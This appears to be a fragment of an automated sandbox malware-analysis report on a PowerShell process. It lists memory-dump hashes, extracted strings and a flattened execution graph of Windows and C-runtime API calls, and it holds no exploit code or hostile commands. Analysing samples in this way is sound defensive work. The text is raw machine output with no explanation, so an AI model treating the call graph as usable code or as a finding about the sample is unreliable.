                          • String ID:
                          • API String ID:
                          • Opcode ID: 82072625f7a5ea68bcd0cfb2640d76e5d8f8c906db7c7b6e363c0a4247122963
                          • Instruction ID: 83e4c251afcc5e1be4eb7b4ffc9497a9b42eaa98f5b07973270e543382dbf8b9
                          • Opcode Fuzzy Hash: 82072625f7a5ea68bcd0cfb2640d76e5d8f8c906db7c7b6e363c0a4247122963
                          • Instruction Fuzzy Hash: 2B2105B5A002199FDB149F6584413FEB7E5BF88310B28892ACC1DEB3C0E6309D40CBE0
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86d3e56129e68b61e0fe9c35789b8339d2813cccb224b0e35e692ddbc12d6ddf
                          • Instruction ID: 265a1781770e2a62da8f625656cf4c02824e05e6abf2c521db9e751e72a4b92c
                          • Opcode Fuzzy Hash: 86d3e56129e68b61e0fe9c35789b8339d2813cccb224b0e35e692ddbc12d6ddf
                          • Instruction Fuzzy Hash: EC214DB4A0425A9FDB00DF98C4809AAFBB5FF49310B158595E809EB352C731FC52CBA0
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e45f9fc855f2a2978a77202adc9cad6f13d4e295433cddfd0798a6451edb961a
                          • Instruction ID: 2ad10f9f0890ffe7a280b79e77b9b8e221a49bf8c850a5af1f9d47ed21f724c3
                          • Opcode Fuzzy Hash: e45f9fc855f2a2978a77202adc9cad6f13d4e295433cddfd0798a6451edb961a
                          • Instruction Fuzzy Hash: F80168B170031AA7E728167549017BA73D27BC5708F24843EA248FE7D5CAB5D98483A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f41647584f392b113cc62f79ef33b8ed8df63b22ec3d5d6ebce5060376a9b0a4
                          • Instruction ID: 03833758b66427b534c467e06ed0cc5605b53ae5f0b0a74c999f8f58d7f002db
                          • Opcode Fuzzy Hash: f41647584f392b113cc62f79ef33b8ed8df63b22ec3d5d6ebce5060376a9b0a4
                          • Instruction Fuzzy Hash: C101F77631021A9BD724556A94007FBF795BBC6226F14C43BD54DCB2C0DA32C846C7A0
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 230a3ee26db516521303eb1ce42ceca21906d0976e594f39a5e276ab5b546786
                          • Instruction ID: 6df9b1eeaea39a9dd10a61b080bda66a7b27982b72eb8cd983171cb109400f84
                          • Opcode Fuzzy Hash: 230a3ee26db516521303eb1ce42ceca21906d0976e594f39a5e276ab5b546786
                          • Instruction Fuzzy Hash: B211EC34A00209EFEB15CFA4D884E9DBBB2FF48314F288555E504AB365C775AD82CB90
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b2f68c50e01d29ecd4047b3a76aff7f97717866a4f20ca5546bda1d762ab29d
                          • Instruction ID: d47c59318d114de08c69cd32f2394dd80551aeffe4320fdf0c3e5eb944ca2adb
                          • Opcode Fuzzy Hash: 9b2f68c50e01d29ecd4047b3a76aff7f97717866a4f20ca5546bda1d762ab29d
                          • Instruction Fuzzy Hash: 1B01A2F2F092255FE3251A641C667EA6322ABC1658B04047BCE019F7CBDA769D0287E3
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646492909.00000000044ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 044ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_44ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e0eaa96c933ff40887bda4f6977302fcfc7313381981360b1bd6a02cf3ae0ce
                          • Instruction ID: b30d4136e7efb63aa8c4fc3a0560189a8776f5196587821bc52cc87d6dd65fd9
                          • Opcode Fuzzy Hash: 3e0eaa96c933ff40887bda4f6977302fcfc7313381981360b1bd6a02cf3ae0ce
                          • Instruction Fuzzy Hash: 9F01217140E3C09FD7128B259D94B62BFB4DF43229F1D81DBD9888F2A3C2695849CB72
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646492909.00000000044ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 044ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_44ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2736004c8a2088c7fe876fd6d433e10e2f29d58c9b3d058a04d3d422162bad6f
                          • Instruction ID: a9feaa94d5ac91e790886c50e90eb42bcdff18a611530b0aeb348c0680d65279
                          • Opcode Fuzzy Hash: 2736004c8a2088c7fe876fd6d433e10e2f29d58c9b3d058a04d3d422162bad6f
                          • Instruction Fuzzy Hash: 8601D4B1904341AEEB204E22DD84777BB98DF41229F1C842ADC480B242C279A442CAB1
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a513f92953f5b5b2959273891ed677c3dd25ab7475a77c7dc354c4280193bc06
                          • Instruction ID: d8063647e362fceffe466c2d5037fd90a90800d5dd24391a4656e4080158c341
                          • Opcode Fuzzy Hash: a513f92953f5b5b2959273891ed677c3dd25ab7475a77c7dc354c4280193bc06
                          • Instruction Fuzzy Hash: 67018F74A04315CFDB01CB68C890AA9BBB1FF89314B1486AAD805DB362D776EC52CB50
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                          • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                          • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                          • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d2452638c361301c799cf230f9a2985dfd70d5117b99b8c35537144637e981a
                          • Instruction ID: 6820de4dfab4cb3f236a9b2939a5bad3f9758945036f0e84817fc7f3fbff6a91
                          • Opcode Fuzzy Hash: 9d2452638c361301c799cf230f9a2985dfd70d5117b99b8c35537144637e981a
                          • Instruction Fuzzy Hash: 94915171E40209DFEF14CFA9C8857ADBBF2EF48314F148A29E804E7254EBB4A855CB55
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646492909.00000000044ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 044ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_44ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22b71d9c29c1fbc38eb11543b36be4af11745a9171285e7fb39895aba886250a
                          • Instruction ID: 6c832a0dad2d268569e2f951ce4509cecee08f5359938710a08bc829063fa07d
                          • Opcode Fuzzy Hash: 22b71d9c29c1fbc38eb11543b36be4af11745a9171285e7fb39895aba886250a
                          • Instruction Fuzzy Hash: FD21F5B6A04301EFDF15DF10D9C0B27BBA5FB84315F24856AE9090F356C336E456CAA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$84m$84m$84m$84m$tPq$tPq$tPq$tPq$$q
                          • API String ID: 0-1821285935
                          • Opcode ID: 3b537743fae11e79771253d5a303929a06e161c9c3685cc631f74c15f43f7fa7
                          • Instruction ID: 730a1e45541e13b8ee966544c4455d4c93bda88816f8e214e3c16449c6128cda
                          • Opcode Fuzzy Hash: 3b537743fae11e79771253d5a303929a06e161c9c3685cc631f74c15f43f7fa7
                          • Instruction Fuzzy Hash: A2A1E971B002069FDB24AF65C9067EAB7E2BF89310F288956E8455F2D1DB31DD41CBE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 84m$84m$XRq$XRq$XRq$tPq$tPq$$q
                          • API String ID: 0-509855940
                          • Opcode ID: 43c7145740e84cbf477cbca7392f551973441d9b0c2d5113585405fa70d7d63b
                          • Instruction ID: c158a3c15cf26120195c1c3469a55958147f44195ed4983e5a7abc38be5a6f1d
                          • Opcode Fuzzy Hash: 43c7145740e84cbf477cbca7392f551973441d9b0c2d5113585405fa70d7d63b
                          • Instruction Fuzzy Hash: 3061E471B0020A9FDB349F688444BEAB7B2BF89610F24C46AD8059F2D1CB31DD45CBE2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q
                          • API String ID: 0-2958727440
                          • Opcode ID: 8eac738f2d520e99e6faf5b97255347c7cda1d07cdad2921b2e9dd7e584de289
                          • Instruction ID: be81141618b2dfcb5f82fc5596168bf89a52e9786205c01e5f0e886a69bd14a3
                          • Opcode Fuzzy Hash: 8eac738f2d520e99e6faf5b97255347c7cda1d07cdad2921b2e9dd7e584de289
                          • Instruction Fuzzy Hash: 1751C8B1B0420ADFEF258B6584407E9B7A2FF89214F14C866E8555F2D1CB32E942CBD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$$q$$q$$q$$q$$q
                          • API String ID: 0-2069967915
                          • Opcode ID: f02442d230cf5bf53375cb6667a7e7966421f27ea98a1b097074234c2628c8df
                          • Instruction ID: 614125ae2b9802caf7c939a73549f7507714e23813e8cc29ab6cfd98d608b450
                          • Opcode Fuzzy Hash: f02442d230cf5bf53375cb6667a7e7966421f27ea98a1b097074234c2628c8df
                          • Instruction Fuzzy Hash: A9310BB9B043878FDF35456E54512F6B7A2BB89251B184C7BC4438F281DE31E456C7D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 84m$84m$tPq$tPq$$q
                          • API String ID: 0-3407104185
                          • Opcode ID: ac85456f8cf674ea3f97ffce098a67ccf3aff21e0683dc6770be3a59e08c9d5d
                          • Instruction ID: 5c72c4b77a664ad69d22f0514c8ac8fc403faf62bbff7d7f6a9a683635428b3d
                          • Opcode Fuzzy Hash: ac85456f8cf674ea3f97ffce098a67ccf3aff21e0683dc6770be3a59e08c9d5d
                          • Instruction Fuzzy Hash: 4161C771B042069FDB24AB68C445BEAB7E2FF89610F38C86ED4459F291CB31DC45CBA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$$q$$q$$q
                          • API String ID: 0-170447905
                          • Opcode ID: 48e8573c0e8278461e5ccc2e8cd82d837242c3b9171801b237466507d4475005
                          • Instruction ID: bd6304bd9f3c5926bbf0339e9c2e085a7f202cb4f627f62df31e9cf5d768b612
                          • Opcode Fuzzy Hash: 48e8573c0e8278461e5ccc2e8cd82d837242c3b9171801b237466507d4475005
                          • Instruction Fuzzy Hash: 304119B1B043069FDB255A2598107FF7BA2AFC6210F14846BD909DF2D2DB35C942C7E2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$$q$$q$$q
                          • API String ID: 0-170447905
                          • Opcode ID: a9f17e7c5ddf5e905ac63608a0d2ebef2ec809e526bef6463ba9e325ab4d47b5
                          • Instruction ID: 6e71f8b23d3140e8e1d330264459bfce4b168ac0260e6d8de297c3bad23c5ba0
                          • Opcode Fuzzy Hash: a9f17e7c5ddf5e905ac63608a0d2ebef2ec809e526bef6463ba9e325ab4d47b5
                          • Instruction Fuzzy Hash: 203108F2F0821B8FDB356A7584526F6BBA1BBC6510B38487BC946DA1C5DA35C402C7E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q$4'q
                          • API String ID: 0-4210068417
                          • Opcode ID: 485ceb13dd133e6d88481d8886c60449577ebeb986f5b9503b626c926dac2091
                          • Instruction ID: 35b24e097d6bbe20f7c143b7d07dfcd0973f5a57bde6ac12252cca506466d124
                          • Opcode Fuzzy Hash: 485ceb13dd133e6d88481d8886c60449577ebeb986f5b9503b626c926dac2091
                          • Instruction Fuzzy Hash: 6F1253B4A003199FDB24DF64C990BEAB7B2BF89304F108599D5096B795CB31ED81CF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$$q$$q$$q
                          • API String ID: 0-4102054182
                          • Opcode ID: 16778066e1fe79a0339bad75323f7f78429d5bd715f502e71d9ebfe504af9402
                          • Instruction ID: 3804257deb67048f4c6a6ce1758d072bba290e41ddab82c101d85555dc0cf754
                          • Opcode Fuzzy Hash: 16778066e1fe79a0339bad75323f7f78429d5bd715f502e71d9ebfe504af9402
                          • Instruction Fuzzy Hash: A42135B57103569BEB34592A8848BF677E6ABC1614F24C42B9509DB3C2DD75D80183A1

                          Execution Graph

                          Execution Coverage:2%
                          Dynamic/Decrypted Code Coverage:96.7%
                          Signature Coverage:1.5%
                          Total number of Nodes:1715
                          Total number of Limit Nodes:1
                          execution_graph 7309 1fab742b 7312 1fab7430 7309->7312 7311 1fab7453 7312->7311 7313 1fab8bae 7312->7313 7314 1fab8bbb 7313->7314 7315 1fab8bdd 7313->7315 7316 1fab8bc9 RtlDeleteCriticalSection 7314->7316 7317 1fab8bd7 7314->7317 7315->7312 7316->7316 7316->7317 7318 1fab571e _free 20 API calls 7317->7318 7318->7315 7319 405ac1 lstrlenW 7320 405acf 7319->7320 7321 405ae1 7320->7321 7322 405ad5 CharPrevW 7320->7322 7322->7320 7322->7321 6175 1fab60ac 6176 1fab60dd 6175->6176 6177 1fab60b7 6175->6177 6177->6176 6178 1fab60c7 FreeLibrary 6177->6178 6178->6177 6179 1fab21a1 ___scrt_dllmain_exception_filter 6180 1fab81a0 6181 1fab81d9 6180->6181 6182 1fab81dd 6181->6182 6190 1fab8205 6181->6190 6183 1fab6368 __dosmaperr 20 API calls 6182->6183 6185 1fab81e2 6183->6185 6184 1fab8529 6187 1fab2ada _ValidateLocalCookies 5 API calls 6184->6187 6194 1fab62ac 6185->6194 6188 1fab8536 6187->6188 6190->6184 6197 1fab80c0 6190->6197 6191 1fab2ada _ValidateLocalCookies 5 API calls 6193 1fab81f9 6191->6193 6201 1fab6231 6194->6201 6196 1fab62b8 6196->6191 6198 1fab80db 6197->6198 6199 1fab2ada _ValidateLocalCookies 5 API calls 6198->6199 6200 1fab8152 6199->6200 6200->6190 6202 1fab5b7a _abort 20 API calls 6201->6202 6203 1fab6247 6202->6203 6204 1fab62a6 6203->6204 6207 1fab6255 6203->6207 6212 1fab62bc IsProcessorFeaturePresent 6204->6212 6206 1fab62ab 6208 1fab6231 _abort 26 API calls 6206->6208 6209 1fab2ada _ValidateLocalCookies 5 API calls 6207->6209 6210 1fab62b8 6208->6210 6211 1fab627c 6209->6211 6210->6196 6211->6196 6213 1fab62c7 6212->6213 6216 1fab60e2 6213->6216 6217 1fab60fe ___scrt_fastfail 6216->6217 6218 1fab612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6217->6218 6221 1fab61fb ___scrt_fastfail 6218->6221 6219 1fab2ada _ValidateLocalCookies 5 API calls 6220 1fab6219 GetCurrentProcess TerminateProcess 6219->6220 6220->6206 6221->6219 6222 1fabc7a7 6223 1fabc7be 6222->6223 6230 1fabc80d 6222->6230 6223->6230 6231 1fabc7e6 GetModuleHandleA 6223->6231 6224 1fabc872 6225 1fabc835 GetModuleHandleA 6225->6230 6228 1fabc85f GetProcAddress 6228->6230 6230->6224 6230->6225 6230->6228 6232 1fabc7ef 6231->6232 6238 1fabc80d 6231->6238 6240 1fabc803 GetProcAddress 6232->6240 6234 1fabc872 6235 1fabc835 GetModuleHandleA 6235->6238 6238->6234 6238->6235 6239 1fabc85f GetProcAddress 6238->6239 6239->6238 6243 1fabc80d 6240->6243 6241 1fabc872 6242 1fabc835 GetModuleHandleA 6242->6243 6243->6241 6243->6242 6244 1fabc85f GetProcAddress 6243->6244 6244->6243 6245 1fab67bf 6250 1fab67f4 6245->6250 6248 1fab67db 6249 1fab571e _free 20 API calls 6249->6248 6251 1fab67cd 6250->6251 6252 1fab6806 6250->6252 6251->6248 6251->6249 6253 1fab680b 6252->6253 6254 1fab6836 6252->6254 6255 1fab637b _abort 20 API calls 6253->6255 6254->6251 6261 1fab71d6 6254->6261 6256 1fab6814 6255->6256 6258 1fab571e _free 20 API calls 6256->6258 6258->6251 6259 1fab6851 6260 1fab571e _free 20 API calls 6259->6260 6260->6251 6262 1fab71e1 6261->6262 6263 1fab7209 6262->6263 6264 1fab71fa 6262->6264 6265 1fab7218 6263->6265 6270 1fab8a98 6263->6270 6266 1fab6368 __dosmaperr 20 API calls 6264->6266 6277 1fab8acb 6265->6277 6269 1fab71ff ___scrt_fastfail 6266->6269 6269->6259 6271 1fab8ab8 RtlSizeHeap 6270->6271 6272 1fab8aa3 6270->6272 6271->6265 6273 1fab6368 __dosmaperr 20 API calls 6272->6273 6274 1fab8aa8 6273->6274 6275 1fab62ac _abort 26 API calls 6274->6275 6276 1fab8ab3 6275->6276 6276->6265 6278 1fab8ad8 6277->6278 6279 1fab8ae3 6277->6279 6289 1fab56d0 6278->6289 6281 1fab8aeb 6279->6281 6287 1fab8af4 _abort 6279->6287 6282 1fab571e _free 20 API calls 6281->6282 6285 1fab8ae0 6282->6285 6283 1fab8af9 6286 1fab6368 __dosmaperr 20 API calls 6283->6286 6284 1fab8b1e RtlReAllocateHeap 6284->6285 6284->6287 6285->6269 6286->6285 6287->6283 6287->6284 6288 1fab474f _abort 7 API calls 6287->6288 6288->6287 6290 1fab570e 6289->6290 6294 1fab56de _abort 6289->6294 6292 1fab6368 __dosmaperr 20 API calls 6290->6292 6291 1fab56f9 RtlAllocateHeap 6293 1fab570c 6291->6293 6291->6294 6292->6293 6293->6285 6294->6290 6294->6291 6295 1fab474f _abort 7 API calls 6294->6295 6295->6294 7323 1fab1f3f 7324 1fab1f4b ___scrt_is_nonwritable_in_current_image 7323->7324 7341 1fab247c 7324->7341 7326 1fab1f52 7327 1fab1f7c 7326->7327 7328 1fab2041 7326->7328 7335 1fab1f57 ___scrt_is_nonwritable_in_current_image 7326->7335 7352 1fab23de 7327->7352 7364 1fab2639 IsProcessorFeaturePresent 7328->7364 7331 1fab2048 7332 1fab1f8b __RTC_Initialize 7332->7335 7355 1fab22fc RtlInitializeSListHead 7332->7355 7334 1fab1f99 ___scrt_initialize_default_local_stdio_options 7356 1fab46c5 7334->7356 7339 1fab1fb8 7339->7335 7340 1fab4669 _abort 5 API calls 7339->7340 7340->7335 7342 1fab2485 7341->7342 7368 1fab2933 IsProcessorFeaturePresent 7342->7368 7346 1fab249a 7346->7326 7347 1fab2496 7347->7346 7379 1fab53c8 7347->7379 7350 1fab24b1 7350->7326 7435 1fab24b5 7352->7435 7354 1fab23e5 7354->7332 7355->7334 7357 1fab46dc 7356->7357 7358 1fab2ada _ValidateLocalCookies 5 API calls 7357->7358 7359 1fab1fad 7358->7359 7359->7335 7360 1fab23b3 7359->7360 7361 1fab23b8 ___scrt_release_startup_lock 7360->7361 7362 1fab2933 ___isa_available_init IsProcessorFeaturePresent 7361->7362 7363 1fab23c1 7361->7363 7362->7363 7363->7339 7365 1fab264e ___scrt_fastfail 7364->7365 7366 1fab26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7365->7366 7367 1fab2744 ___scrt_fastfail 7366->7367 7367->7331 7369 1fab2491 7368->7369 7370 1fab34ea 7369->7370 7371 1fab34ef ___vcrt_initialize_winapi_thunks 7370->7371 7390 1fab3936 7371->7390 7375 1fab3505 7376 1fab3510 7375->7376 7404 1fab3972 7375->7404 7376->7347 7378 1fab34fd 7378->7347 7427 1fab7457 7379->7427 7382 1fab3529 7383 1fab3532 7382->7383 7384 1fab3543 7382->7384 7385 1fab391b ___vcrt_uninitialize_ptd 6 API calls 7383->7385 7384->7346 7386 1fab3537 7385->7386 7387 1fab3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7386->7387 7388 1fab353c 7387->7388 7431 1fab3c50 7388->7431 7392 1fab393f 7390->7392 7393 1fab3968 7392->7393 7394 1fab34f9 7392->7394 7408 1fab3be0 7392->7408 7395 1fab3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7393->7395 7394->7378 7396 1fab38e8 7394->7396 7395->7394 7413 1fab3af1 7396->7413 7399 1fab38fd 7399->7375 7400 1fab3ba2 ___vcrt_FlsSetValue 6 API calls 7401 1fab390b 7400->7401 7402 1fab3918 7401->7402 7418 1fab391b 7401->7418 7402->7375 7405 1fab397d 7404->7405 7407 1fab399c 7404->7407 7406 1fab3987 RtlDeleteCriticalSection 7405->7406 7406->7406 7406->7407 7407->7378 7409 1fab3a82 try_get_function 5 API calls 7408->7409 7410 1fab3bfa 7409->7410 7411 1fab3c18 InitializeCriticalSectionAndSpinCount 7410->7411 7412 1fab3c03 7410->7412 7411->7412 7412->7392 7414 1fab3a82 try_get_function 5 API calls 7413->7414 7415 1fab3b0b 7414->7415 7416 1fab3b24 TlsAlloc 7415->7416 7417 1fab38f2 7415->7417 7417->7399 7417->7400 7419 1fab392b 7418->7419 7420 1fab3925 7418->7420 7419->7399 7422 1fab3b2c 7420->7422 7423 1fab3a82 try_get_function 5 API calls 7422->7423 7424 1fab3b46 7423->7424 7425 1fab3b5e TlsFree 7424->7425 7426 1fab3b52 7424->7426 7425->7426 7426->7419 7430 1fab7470 7427->7430 7428 1fab2ada _ValidateLocalCookies 5 API calls 7429 1fab24a3 7428->7429 7429->7350 7429->7382 7430->7428 7432 1fab3c7f 7431->7432 7434 1fab3c59 7431->7434 7432->7384 7433 1fab3c69 FreeLibrary 7433->7434 7434->7432 7434->7433 7436 1fab24c8 7435->7436 7437 1fab24c4 7435->7437 7438 1fab2639 ___scrt_fastfail 4 API calls 7436->7438 7440 1fab24d5 ___scrt_release_startup_lock 7436->7440 7437->7354 7439 1fab2559 7438->7439 7440->7354 7441 1fab543d 7442 1fab5440 7441->7442 7443 1fab55a8 _abort 38 API calls 7442->7443 7444 1fab544c 7443->7444 6296 1fab3eb3 6299 1fab5411 6296->6299 6300 1fab541d _abort 6299->6300 6305 1fab5af6 GetLastError 6300->6305 6302 1fab5422 6325 1fab55a8 6302->6325 6306 1fab5b12 6305->6306 6307 1fab5b0c 6305->6307 6309 1fab637b _abort 20 API calls 6306->6309 6311 1fab5b61 SetLastError 6306->6311 6308 1fab5e08 _abort 11 API calls 6307->6308 6308->6306 6310 1fab5b24 6309->6310 6312 1fab5e5e _abort 11 API calls 6310->6312 6317 1fab5b2c 6310->6317 6311->6302 6314 1fab5b41 6312->6314 6313 1fab571e _free 20 API calls 6315 1fab5b32 6313->6315 6316 1fab5b48 6314->6316 6314->6317 6318 1fab5b6d SetLastError 6315->6318 6319 1fab593c _abort 20 API calls 6316->6319 6317->6313 6320 1fab55a8 _abort 35 API calls 6318->6320 6321 1fab5b53 6319->6321 6323 1fab5b79 6320->6323 6322 1fab571e _free 20 API calls 6321->6322 6324 1fab5b5a 6322->6324 6324->6311 6324->6318 6336 1fab7613 6325->6336 6328 1fab55b8 6330 1fab55c2 IsProcessorFeaturePresent 6328->6330 6335 1fab55e0 6328->6335 6331 1fab55cd 6330->6331 6333 1fab60e2 _abort 8 API calls 6331->6333 6333->6335 6366 1fab4bc1 6335->6366 6369 1fab7581 6336->6369 6339 1fab766e 6340 1fab767a _abort 6339->6340 6341 1fab5b7a _abort 20 API calls 6340->6341 6345 1fab76a7 _abort 6340->6345 6348 1fab76a1 _abort 6340->6348 6341->6348 6342 1fab76f3 6343 1fab6368 __dosmaperr 20 API calls 6342->6343 6344 1fab76f8 6343->6344 6346 1fab62ac _abort 26 API calls 6344->6346 6351 1fab771f 6345->6351 6383 1fab5671 RtlEnterCriticalSection 6345->6383 6365 1fab76d6 6346->6365 6348->6342 6348->6345 6348->6365 6353 1fab777e 6351->6353 6355 1fab7776 6351->6355 6362 1fab77a9 6351->6362 6384 1fab56b9 RtlLeaveCriticalSection 6351->6384 6353->6362 6385 1fab7665 6353->6385 6356 1fab4bc1 _abort 28 API calls 6355->6356 6356->6353 6359 1fab5af6 _abort 38 API calls 6363 1fab780c 6359->6363 6361 1fab7665 _abort 38 API calls 6361->6362 6388 1fab782e 6362->6388 6364 1fab5af6 _abort 38 API calls 6363->6364 6363->6365 6364->6365 6392 1fabbdc9 6365->6392 6396 1fab499b 6366->6396 6372 1fab7527 6369->6372 6371 1fab55ad 6371->6328 6371->6339 6373 1fab7533 ___scrt_is_nonwritable_in_current_image 6372->6373 6378 1fab5671 RtlEnterCriticalSection 6373->6378 6375 1fab7541 6379 1fab7575 6375->6379 6377 1fab7568 _abort 6377->6371 6378->6375 6382 1fab56b9 RtlLeaveCriticalSection 6379->6382 6381 1fab757f 6381->6377 6382->6381 6383->6351 6384->6355 6386 1fab5af6 _abort 38 API calls 6385->6386 6387 1fab766a 6386->6387 6387->6361 6389 1fab77fd 6388->6389 6390 1fab7834 6388->6390 6389->6359 6389->6363 6389->6365 6395 1fab56b9 RtlLeaveCriticalSection 6390->6395 6393 1fab2ada _ValidateLocalCookies 5 API calls 6392->6393 6394 1fabbdd4 6393->6394 6394->6394 6395->6389 6397 1fab49a7 _abort 6396->6397 6406 1fab49bf 6397->6406 6418 1fab4af5 GetModuleHandleW 6397->6418 6401 1fab49c7 6405 1fab4a3c 6401->6405 6417 1fab4a65 6401->6417 6428 1fab527a 6401->6428 6409 1fab4a54 6405->6409 6431 1fab4669 6405->6431 6427 1fab5671 RtlEnterCriticalSection 6406->6427 6407 1fab4aae 6412 1fabbdc9 _abort 5 API calls 6407->6412 6408 1fab4a82 6438 1fab4ab4 6408->6438 6414 1fab4669 _abort 5 API calls 6409->6414 6416 1fab4ab3 6412->6416 6414->6417 6435 1fab4aa5 6417->6435 6419 1fab49b3 6418->6419 6419->6406 6420 1fab4b39 GetModuleHandleExW 6419->6420 